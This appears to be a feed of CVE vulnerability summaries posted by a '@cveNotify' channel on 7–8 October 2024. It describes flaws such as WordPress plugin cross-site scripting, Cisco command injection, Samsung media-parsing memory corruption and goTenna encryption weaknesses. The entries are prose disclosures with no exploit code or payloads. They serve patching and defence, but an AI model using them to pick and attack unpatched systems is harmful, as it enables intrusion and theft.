🚨 CVE-2022-49040Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in connection management functionality in Synology Drive Client before 3.4.0-15721 allows local users with administrator privileges to crash the client via unspecified vectors.🎖@cveNotify |
|
| 2024-10-08 15:37:56 |
🚨 CVE-2024-20444A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC), formerly Cisco Data Center Network Manager (DCNM), could allow an authenticated, remote attacker with network-admin privileges to perform a command injection attack against an affected device. This vulnerability is due to insufficient validation of command arguments. An attacker could exploit this vulnerability by submitting crafted command arguments to a specific REST API endpoint. A successful exploit could allow the attacker to overwrite sensitive files or crash a specific container, which would restart on its own, causing a low-impact denial of service (DoS) condition.🎖@cveNotify |
|
| 2024-10-08 15:37:55 |
🚨 CVE-2024-9218The Magazine Blocks – Blog Designer, Magazine & Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.14. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-08 15:37:54 |
🚨 CVE-2023-42183lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.🎖@cveNotify |
|
| 2024-10-08 15:37:49 |
🚨 CVE-2023-50564An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.🎖@cveNotify |
|
| 2024-10-08 15:37:48 |
🚨 CVE-2023-40630Unauthenticated LFI/SSRF in JCDashboards component for Joomla.🎖@cveNotify |
|
| 2024-10-08 15:37:47 |
🚨 CVE-2023-40921SQL Injection vulnerability in functions/point_list.php in Common Services soliberte before v4.3.03 allows attackers to obtain sensitive information via the lat and lng parameters.🎖@cveNotify |
|
| 2024-10-08 15:37:44 |
🚨 CVE-2023-50766A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to send an HTTP request to an attacker-specified URL and parse the response as XML.🎖@cveNotify |
|
| 2024-10-08 15:37:43 |
🚨 CVE-2023-36674An issue was discovered in MediaWiki before 1.35.11, 1.36.x through 1.38.x before 1.38.7, 1.39.x before 1.39.4, and 1.40.x before 1.40.1. It is possible to bypass the Bad image list (aka badFile) by using the thumb parameter (aka Manualthumb) of the File syntax.🎖@cveNotify |
|
| 2024-10-08 15:37:42 |
🚨 CVE-2023-39445Hidden functionality vulnerability in LAN-WH300N/RE all versions provided by LOGITEC CORPORATION allows an unauthenticated attacker to execute arbitrary code by sending a specially crafted file to the product's certain management console.🎖@cveNotify |
|
| 2024-10-08 15:07:50 |
🚨 CVE-2024-41163A directory traversal vulnerability exists in the archive download functionality of Veertu Anka Build 1.42.0. A specially crafted HTTP request can lead to a disclosure of arbitrary files. An attacker can make an unauthenticated HTTP request to exploit this vulnerability.🎖@cveNotify |
|
| 2024-10-08 15:07:49 |
🚨 CVE-2024-9344The BerqWP – Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-08 14:38:02 |
🚨 CVE-2024-45874A DLL hijacking vulnerability in VegaBird Vooki 5.2.9 allows attackers to execute arbitrary code / maintain persistence via placing a crafted DLL file in the same directory as Vooki.exe.🎖@cveNotify |
|
| 2024-10-08 14:37:56 |
🚨 CVE-2024-45873A DLL hijacking vulnerability in VegaBird Yaazhini 2.0.2 allows attackers to execute arbitrary code / maintain persistence via placing a crafted DLL file in the same directory as Yaazhini.exe.🎖@cveNotify |
|
| 2024-10-08 14:37:55 |
🚨 CVE-2024-47618Sulu is a PHP content management system. Sulu is vulnerable against XSS whereas a low privileged user with access to the “Media” section can upload an SVG file with a malicious payload. Once uploaded and accessed, the malicious javascript will be executed on the victims’ (other users including admins) browsers. This issue is fixed in 2.6.5.🎖@cveNotify |
|
| 2024-10-08 14:37:54 |
🚨 CVE-2024-47617Sulu is a PHP content management system. This vulnerability allows an attacker to inject arbitrary HTML/JavaScript code through the media download URL in Sulu CMS. It affects the SuluMediaBundle component. The vulnerability is a Reflected Cross-Site Scripting (XSS) issue, which could potentially allow attackers to steal sensitive information, manipulate the website's content, or perform actions on behalf of the victim. This vulnerability is fixed in 2.6.5 and 2.5.21.🎖@cveNotify |
|
| 2024-10-08 14:37:51 |
🚨 CVE-2024-8352The Social Web Suite – Social Media Auto Post, Social Media Auto Publish plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.1.11 via the download_log function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.🎖@cveNotify |
|
| 2024-10-08 14:37:50 |
🚨 CVE-2024-20432A vulnerability in the REST API and web UI of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, low-privileged, remote attacker to perform a command injection attack against an affected device. This vulnerability is due to improper user authorization and insufficient validation of command arguments. An attacker could exploit this vulnerability by submitting crafted commands to an affected REST API endpoint or through the web UI. A successful exploit could allow the attacker to execute arbitrary commands on the CLI of a Cisco NDFC-managed device with network-admin privileges. Note: This vulnerability does not affect Cisco NDFC when it is configured for storage area network (SAN) controller deployment.🎖@cveNotify |
|
| 2024-10-08 14:37:49 |
🚨 CVE-2024-20365A vulnerability in the Redfish API of Cisco UCS B-Series, Cisco UCS Managed C-Series, and Cisco UCS X-Series Servers could allow an authenticated, remote attacker with administrative privileges to perform command injection attacks on an affected system and elevate privileges to root.This vulnerability is due to insufficient input validation. An attacker with administrative privileges could exploit this vulnerability by sending crafted commands through the Redfish API on an affected device. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2024-10-08 14:08:03 |
🚨 CVE-2015-9299The events-manager plugin before 5.5.7.1 for WordPress has DOM XSS.🎖@cveNotify |
|
| 2024-10-08 14:07:57 |
🚨 CVE-2015-9298The events-manager plugin before 5.6 for WordPress has code injection.🎖@cveNotify |
|
| 2024-10-08 14:07:56 |
🚨 CVE-2018-0576Cross-site scripting vulnerability in Events Manager plugin prior to version 5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-10-08 14:07:55 |
🚨 CVE-2018-9020The Events Manager plugin before 5.8.1.2 for WordPress allows XSS via the events-manager.js mapTitle parameter in the Google Maps miniature.🎖@cveNotify |
|
| 2024-10-08 13:37:24 |
🚨 CVE-2023-40313A BeanShell interpreter in remote server mode runs in OpenMNS Horizon versions earlier than 32.0.2 and in related Meridian versions which could allow arbitrary remote Java code execution. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.🎖@cveNotify |
|
| 2024-10-08 12:37:33 |
🚨 CVE-2024-8431The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajaxGetGalleryJson() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve private post titles.🎖@cveNotify |
|
| 2024-10-08 11:37:25 |
🚨 CVE-2024-9005CWE-502: Deserialization of Untrusted Data vulnerability exists that could allow code to beremotely executed on the server when unsafely deserialized data is posted to the web server.🎖@cveNotify |
|
| 2024-10-08 11:37:24 |
🚨 CVE-2024-8488The Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Survey fields in all versions up to, and including, 4.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-10-08 10:37:34 |
🚨 CVE-2024-8629The WooCommerce Multilingual & Multicurrency with WPML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.3.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-08 10:37:33 |
🚨 CVE-2024-8422CWE-416: Use After Free vulnerability exists that could cause arbitrary code execution, denialof service and loss of confidentiality & integrity when application user opens a malicious ZelioSoft 2 project file.🎖@cveNotify |
|
| 2024-10-08 10:37:32 |
🚨 CVE-2024-3506A possible buffer overflow in selected cameras' drivers from XProtect Device Pack can allow an attacker with access to internal network to execute commands on Recording Server under strict conditions.🎖@cveNotify |
|
| 2024-10-08 10:37:29 |
🚨 CVE-2024-45277The SAP HANA Node.js client package versions from 2.0.0 before 2.21.31 is impacted by Prototype Pollution vulnerability allowing an attacker to add arbitrary properties to global object prototypes. This is due to improper user input sanitation when using the nestTables feature causing low impact on the availability of the application. This has no impact on Confidentiality and Integrity.🎖@cveNotify |
|
| 2024-10-08 10:37:28 |
🚨 CVE-2023-26319Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Xiaomi Xiaomi Router allows Command Injection.🎖@cveNotify |
|
| 2024-10-08 10:37:27 |
🚨 CVE-2023-26317Xiaomi routers have an external interface that can lead to command injection. The vulnerability is caused by lax filtering of responses from external interfaces. Attackers can exploit this vulnerability to gain access to the router by hijacking the ISP or upper-layer routing.🎖@cveNotify |
|
| 2024-10-08 08:37:43 |
🚨 CVE-2024-8964The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 7.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-08 08:37:42 |
🚨 CVE-2024-47095Cross Site Scripting vulnerability in Follet School Solutions Destiny before v22.0.1 AU1 allows a remote attacker to run arbitrary client-side code via the expiredSupportMessage parameter of handleloginform.do.🎖@cveNotify |
|
| 2024-10-08 07:37:37 |
🚨 CVE-2024-34672Improper input validation in SamsungVideoPlayer prior to versions 7.3.29.1 in Android 12, 7.3.36.1 in Android 13, and 7.3.41.230 in Android 14 allows local attackers to access video file of other users.🎖@cveNotify |
|
| 2024-10-08 07:37:31 |
🚨 CVE-2024-34671Use of implicit intent for sensitive communication in translation혻in Samsung Internet prior to version 26.0.3.1 allows local attackers to get sensitive information. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-10-08 07:37:30 |
🚨 CVE-2024-34668Out-of-bounds write in parsing h.263 format in librtppayload.so prior to SMR Oct-2024 Release 1 allows remote attackers to execute arbitrary code with system privilege. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-10-08 07:37:29 |
🚨 CVE-2024-34667Out-of-bounds write in parsing h.265 format in librtppayload.so prior to SMR Oct-2024 Release 1 allows remote attackers to execute arbitrary code with system privilege. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-10-08 07:37:26 |
🚨 CVE-2024-34665Out-of-bounds write in parsing h.264 format in librtppayload.so prior to SMR Oct-2024 Release 1 allows remote attackers to execute arbitrary code with system privilege. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-10-08 07:37:25 |
🚨 CVE-2024-34663Integer overflow in libSEF.quram.so prior to SMR Oct-2024 Release 1 allows local attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-10-08 07:37:24 |
🚨 CVE-2024-34662Improper access control in ActivityManager prior to SMR Oct-2024 Release 1 in select Android 12, 13 and SMR Sep-2024 Release 1 in select Android 14 allows local attackers to execute privileged behaviors.🎖@cveNotify |
|
| 2024-10-08 06:37:25 |
🚨 CVE-2024-9021In the process of testing the Relevanssi WordPress plugin before 4.23.1, a vulnerability was found that allows you to implement Stored XSS on behalf of the Contributor+ by embedding malicious script, which entails account takeover backdoor🎖@cveNotify |
|
| 2024-10-08 06:37:24 |
🚨 CVE-2024-8983Custom Twitter Feeds WordPress plugin before 2.2.3 is not filtering some of its settings allowing high privilege users to inject scripts.🎖@cveNotify |
|
| 2024-10-08 05:37:25 |
🚨 CVE-2024-21533All versions of the package ggit are vulnerable to Arbitrary Argument Injection via the clone() API, which allows specifying the remote URL to clone and the file on disk to clone to. The library does not sanitize for user input or validate a given URL scheme, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options.🎖@cveNotify |
|
| 2024-10-08 05:37:24 |
🚨 CVE-2024-21532All versions of the package ggit are vulnerable to Command Injection via the fetchTags(branch) API, which allows user input to specify the branch to be fetched and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API.🎖@cveNotify |
|
| 2024-10-08 04:37:32 |
🚨 CVE-2024-45277The SAP HANA Node.js client package versions from 2.0.0 before 2.21.31 is impacted by Prototype Pollution vulnerability allowing an attacker to add arbitrary properties to global object prototypes. This is due to improper user input sanitation when using the nestTables feature causing low impact on the availability of the application. This has no impact on Confidentiality and Integrity.🎖@cveNotify |
|
| 2024-10-08 04:37:26 |
🚨 CVE-2024-43697in OpenHarmony v4.1.0 and prior versions allow a local attacker cause DOS through improper input.🎖@cveNotify |
|
| 2024-10-08 04:37:25 |
🚨 CVE-2024-39806in OpenHarmony v4.1.0 and prior versions allow a local attacker cause information leak through out-of-bounds Read.🎖@cveNotify |
|
| 2024-10-08 04:37:24 |
🚨 CVE-2024-37179SAP BusinessObjects Business Intelligence Platform allows an authenticated user to send a specially crafted request to the Web Intelligence Reporting Server to download any file from the machine hosting the service, causing high impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-10-07 22:37:25 |
🚨 CVE-2024-45873A DLL hijacking vulnerability in VegaBird Yaazhini 2.0.2 allows attackers to execute arbitrary code / maintain persistence via placing a crafted DLL file in the same directory as Yaazhini.exe.🎖@cveNotify |
|
| 2024-10-07 22:37:24 |
🚨 CVE-2024-47967Improper resource initialization handling in firmware of some Solidigm DC Products may allow an attacker to potentially enable denial of service.🎖@cveNotify |
|
| 2024-10-07 21:37:32 |
🚨 CVE-2024-43362Cacti is an open source performance and fault management framework. The `fileurl` parameter is not properly sanitized when saving external links in `links.php` . Morever, the said fileurl is placed in some html code which is passed to the `print` function in `link.php` and `index.php`, finally leading to stored XSS. Users with the privilege to create external links can manipulate the `fileurl` parameter in the http post request while creating external links to perform stored XSS attacks. The vulnerability known as XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be displayed on a web page without proper validation or escaping. This issue has been addressed in release version 1.2.28. All users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-10-07 21:37:25 |
🚨 CVE-2024-8758The Quiz and Survey Master (QSM) WordPress plugin before 9.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-10-07 21:37:24 |
🚨 CVE-2024-7885A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.🎖@cveNotify |
|
| 2024-10-07 20:37:32 |
🚨 CVE-2024-5742A vulnerability was found in GNU Nano that allows a possible privilege escalation through an insecure temporary file. If Nano is killed while editing, a file it saves to an emergency file with the permissions of the running user provides a window of opportunity for attackers to escalate privileges through a malicious symlink.🎖@cveNotify |
|
| 2024-10-07 20:37:25 |
🚨 CVE-2023-32200There is insufficient restrictions of called script functions in Apache Jena versions 4.8.0 and earlier. It allows a remote user to execute javascript via a SPARQL query.This issue affects Apache Jena: from 3.7.0 through 4.8.0.🎖@cveNotify |
|
| 2024-10-07 20:37:24 |
🚨 CVE-2023-33008Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache Johnzon.A malicious attacker can craft up some JSON input that uses large numbers (numbers such as 1e20000000) that Apache Johnzon will deserialize into BigDecimal and maybe use numbers too large which may result in a slow conversion (Denial of service risk). Apache Johnzon 1.2.21 mitigates this by setting a scale limit of 1000 (by default) to the BigDecimal. This issue affects Apache Johnzon: through 1.2.20.🎖@cveNotify |
|
| 2024-10-07 20:07:32 |
🚨 CVE-2024-46409A stored cross-site scripting (XSS) vulnerability in SeedDMS v6.0.28 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter in the Calendar page.🎖@cveNotify |
|
| 2024-10-07 20:07:26 |
🚨 CVE-2024-46658Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 was discovered to contain an authenticated command injection vulnerability.🎖@cveNotify |
|
| 2024-10-07 20:07:25 |
🚨 CVE-2024-43694In the goTenna Pro ATAK Plugin application, the encryption keys are stored along with a static IV on the device. This allows for complete decryption of keys stored on the device. This allows an attacker to decrypt all encrypted broadcast communications based on broadcast keys stored on the device.🎖@cveNotify |
|
| 2024-10-07 20:07:24 |
🚨 CVE-2024-43108The goTenna Pro ATAK Plugin use AES CTR mode for short, encrypted messages without any additional integrity checking mechanisms. This leaves messages malleable to any attacker that can access the message.🎖@cveNotify |
|
| 2024-10-07 19:37:32 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-07 19:37:26 |
🚨 CVE-2023-1818Use after free in Vulkan in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-10-07 19:37:25 |
🚨 CVE-2021-43957Affected versions of Atlassian Fisheye & Crucible allowed remote attackers to browse local files via an Insecure Direct Object References (IDOR) vulnerability in the WEB-INF directory and bypass the fix for CVE-2020-29446 due to a lack of url decoding. The affected versions are before version 4.8.9.🎖@cveNotify |
|
| 2024-10-07 19:37:24 |
🚨 CVE-2021-43944This issue exists to document that a security improvement in the way that Jira Server and Data Center use templates has been implemented. Affected versions of Atlassian Jira Server and Data Center allowed remote attackers with system administrator permissions to execute arbitrary code via Template Injection leading to Remote Code Execution (RCE) in the Email Templates feature. The affected versions are before version 8.13.15, and from version 8.14.0 before 8.20.3.🎖@cveNotify |
|
| 2024-10-07 19:07:32 |
🚨 CVE-2024-9265The Echo RSS Feed Post Generator plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.4.6. This is due to the plugin not properly restricting the roles that can set during registration through the echo_check_post_header_sent() function. This makes it possible for unauthenticated attackers to register as an administrator.🎖@cveNotify |
|
| 2024-10-07 19:07:26 |
🚨 CVE-2024-9241The PDF Image Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-07 19:07:25 |
🚨 CVE-2024-45838The goTenna Pro ATAK Plugin does not encrypt the callsigns of its users. These callsigns reveal information about the users and can also be leveraged for other vulnerabilities.🎖@cveNotify |
|
| 2024-10-07 19:07:24 |
🚨 CVE-2024-41931The goTenna Pro ATAK Plugin broadcast key name is always sent unencrypted and could reveal the location of operation.🎖@cveNotify |
|
| 2024-10-07 18:37:37 |
🚨 CVE-2024-9289The WordPress & WooCommerce Affiliate Program plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 8.4.1. This is due to the rtwwwap_login_request_callback() function not properly validating a user's identity prior to authenticating them to the site. This makes it possible for unauthenticated attackers to log in as any user, including administrators, granted they have access to the administrator's email.🎖@cveNotify |
|
| 2024-10-07 18:37:31 |
🚨 CVE-2024-7675A maliciously crafted DWF file, when parsed in w3dtk.dll through Autodesk Navisworks, can force a Use-After-Free. A malicious actor can leverage this vulnerability to cause a crash or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-10-07 18:37:30 |
🚨 CVE-2024-7672A maliciously crafted DWF file, when parsed in dwfcore.dll through Autodesk Navisworks, can force an Out-of-Bounds Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-10-07 18:37:29 |
🚨 CVE-2024-7671A maliciously crafted DWFX file, when parsed in dwfcore.dll through Autodesk Navisworks, can force an Out-of-Bounds Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-10-07 18:37:26 |
🚨 CVE-2024-30515Missing Authorization vulnerability in Pixelite Events Manager.This issue affects Events Manager: from n/a through 6.4.6.4.🎖@cveNotify |
|
| 2024-10-07 18:37:25 |
🚨 CVE-2023-45207An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15, 9.0, and 10.0. An attacker can send a PDF document through mail that contains malicious JavaScript. While previewing this file in webmail in the Chrome browser, the stored XSS payload is executed. (This has been mitigated by sanitising the JavaScript code present in a PDF document.)🎖@cveNotify |
|
| 2024-10-07 18:37:24 |
🚨 CVE-2023-45206An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15, 9.0, and 10.0. Through the help document endpoint in webmail, an attacker can inject JavaScript or HTML code that leads to cross-site scripting (XSS). (Adding an adequate message to avoid malicious code will mitigate this issue.)🎖@cveNotify |
|
| 2024-10-07 18:07:36 |
🚨 CVE-2024-7687The AZIndex WordPress plugin through 0.8.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.🎖@cveNotify |
|
| 2024-10-07 18:07:30 |
🚨 CVE-2024-6910The EventON WordPress plugin before 2.2.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.🎖@cveNotify |
|
| 2024-10-07 18:07:29 |
🚨 CVE-2024-7786The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.🎖@cveNotify |
|
| 2024-10-07 18:07:28 |
🚨 CVE-2023-52447In the Linux kernel, the following vulnerability has been resolved:bpf: Defer the free of inner map when necessaryWhen updating or deleting an inner map in map array or map htab, the mapmay still be accessed by non-sleepable program or sleepable program.However bpf_map_fd_put_ptr() decreases the ref-counter of the inner mapdirectly through bpf_map_put(), if the ref-counter is the last one(which is true for most cases), the inner map will be freed byops->map_free() in a kworker. But for now, most .map_free() callbacksdon't use synchronize_rcu() or its variants to wait for the elapse of aRCU grace period, so after the invocation of ops->map_free completes,the bpf program which is accessing the inner map may incuruse-after-free problem.Fix the free of inner map by invoking bpf_map_free_deferred() after bothone RCU grace period and one tasks trace RCU grace period if the innermap has been removed from the outer map before. The deferment isaccomplished by using call_rcu() or call_rcu_tasks_trace() whenreleasing the last ref-counter of bpf map. The newly-added rcu_headfield in bpf_map shares the same storage space with work field toreduce the size of bpf_map.🎖@cveNotify |
|
| 2024-10-07 17:37:32 |
🚨 CVE-2024-7892The adstxt Plugin WordPress plugin through 1.0.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-10-07 17:37:26 |
🚨 CVE-2024-8668The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +12 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tooltip and countdown functionality in all versions up to, and including, 2.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-07 17:37:25 |
🚨 CVE-2024-20343A vulnerability in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to read any file in the file system of the underlying Linux operating system. The attacker must have valid credentials on the affected device.This vulnerability is due to incorrect validation of the arguments that are passed to a specific CLI command. An attacker could exploit this vulnerability by logging in to an affected device with low-privileged credentials and using the affected command. A successful exploit could allow the attacker access files in read-only mode on the Linux file system.🎖@cveNotify |
|
| 2024-10-07 17:07:25 |
🚨 CVE-2024-45803Wire UI is a library of components and resources to empower Laravel and Livewire application development. A potential Cross-Site Scripting (XSS) vulnerability has been identified in the `/wireui/button` endpoint, specifically through the `label` query parameter. Malicious actors could exploit this vulnerability by injecting JavaScript into the `label` parameter, leading to the execution of arbitrary code in the victim's browser. The `/wireui/button` endpoint dynamically renders button labels based on user-provided input via the `label` query parameter. Due to insufficient sanitization or escaping of this input, an attacker can inject malicious JavaScript. By crafting such a request, an attacker can inject arbitrary code that will be executed by the browser when the endpoint is accessed. If exploited, this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the affected website. This could lead to: **Session Hijacking**: Stealing session cookies, tokens, or other sensitive information. **User Impersonation**: Performing unauthorized actions on behalf of authenticated users. **Phishing**: Redirecting users to malicious websites. **Content Manipulation**: Altering the appearance or behavior of the affected page to mislead users or execute further attacks. The severity of this vulnerability depends on the context of where the affected component is used, but in all cases, it poses a significant risk to user security. This issue has been addressed in release versions 1.19.3 and 2.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-07 17:07:24 |
🚨 CVE-2024-7918The Pocket Widget WordPress plugin through 0.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-10-07 16:37:43 |
🚨 CVE-2024-46278Teedy 1.11 is vulnerable to Cross Site Scripting (XSS) via the management console.🎖@cveNotify |
|
| 2024-10-07 16:37:37 |
🚨 CVE-2024-46041IoT Haat Smart Plug IH-IN-16A-S v5.16.1 is vulnerable to Authentication Bypass by Capture-replay.🎖@cveNotify |
|
| 2024-10-07 16:37:36 |
🚨 CVE-2024-28710Cross Site Scripting vulnerability in LimeSurvey before 6.5.0+240319 allows a remote attacker to execute arbitrary code via a lack of input validation and output encoding in the Alert Widget's message component.🎖@cveNotify |
|
| 2024-10-07 16:37:35 |
🚨 CVE-2024-28709Cross Site Scripting vulnerability in LimeSurvey before 6.5.12+240611 allows a remote attacker to execute arbitrary code via a crafted script to the title and comment fields.🎖@cveNotify |
|
| 2024-10-07 16:37:32 |
🚨 CVE-2024-47850CUPS cups-browsed before 2.5b1 will send an HTTP POST request to an arbitrary destination and port in response to a single IPP UDP packet requesting a printer to be added, a different vulnerability than CVE-2024-47176. (The request is meant to probe the new printer but can be used to create DDoS amplification attacks.)🎖@cveNotify |
|
| 2024-10-07 16:37:31 |
🚨 CVE-2024-9291A vulnerability classified as problematic has been found in kalvinGit kvf-admin up to f12a94dc1ebb7d1c51ee978a85e4c7ed75c620ff. Affected is an unknown function of the file /ueditor/upload?configPath=ueditor/config.json&action=uploadfile of the component XML File Handler. The manipulation of the argument upfile leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The GitHub repository of the project did not receive an update for more than two years.🎖@cveNotify |
|
| 2024-10-07 16:37:30 |
🚨 CVE-2024-47124The goTenna pro series does not encrypt the callsigns of its users. These callsigns reveal information about the users and can also be leveraged for other vulnerabilities.🎖@cveNotify |
|
| 2024-10-07 16:37:26 |
🚨 CVE-2024-47121The goTenna Pro series uses a weak password for the QR broadcast message. If the QR broadcast message is captured over RF it is possible to decrypt it and use it to decrypt all future and past messages sent via encrypted broadcast.🎖@cveNotify |
|
| 2024-10-07 16:37:25 |
🚨 CVE-2024-30485Missing Authorization vulnerability in XLPlugins Finale Lite.This issue affects Finale Lite: from n/a through 2.18.0.🎖@cveNotify |
|
| 2024-10-07 16:37:24 |
🚨 CVE-2022-26320The Rambus SafeZone Basic Crypto Module before 10.4.0, as used in certain Fujifilm (formerly Fuji Xerox) devices before 2022-03-01, Canon imagePROGRAF and imageRUNNER devices through 2022-03-14, and potentially many other devices, generates RSA keys that can be broken with Fermat's factorization method. This allows efficient calculation of private RSA keys from the public key of a TLS certificate.🎖@cveNotify |
|
| 2024-10-07 16:07:41 |
🚨 CVE-2024-9329In Eclipse Glassfish versions before 7.0.17, The Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is '/management/domain'. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.🎖@cveNotify |
|
| 2024-10-07 16:07:37 |
🚨 CVE-2024-8283The Slider by 10Web WordPress plugin before 1.2.59 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-10-07 16:07:36 |
🚨 CVE-2024-9325A vulnerability classified as critical has been found in Intelbras InControl up to 2.21.56. This affects an unknown part of the file C:\Program Files (x86)\Intelbras\Incontrol Cliente\incontrol_webcam\incontrol-service-watchdog.exe. The manipulation leads to unquoted search path. It is possible to launch the attack on the local host. The vendor was informed early on 2024-08-05 about this issue. The release of a fixed version 2.21.58 was announced for the end of August 2024 but then was postponed until 2024-09-20.🎖@cveNotify |
|
| 2024-10-07 16:07:35 |
